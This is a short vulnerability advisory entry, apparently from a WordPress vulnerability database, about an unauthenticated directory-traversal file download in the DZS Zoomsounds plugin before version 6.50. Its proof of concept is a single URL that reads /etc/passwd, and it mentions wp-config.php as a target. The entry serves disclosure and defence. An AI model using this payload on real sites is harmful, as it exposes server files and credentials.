WordPress Plugin Vulnerabilities
DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
Description
The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the dzsap_download action using directory traversal in the link parameter
Proof of Concept
https://example.com/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd
Affects Plugins
References
Classification
Type
FILE DOWNLOAD
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
DigitalJessica Ltd
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-31 (about 2 years ago)
Added
2021-08-31 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)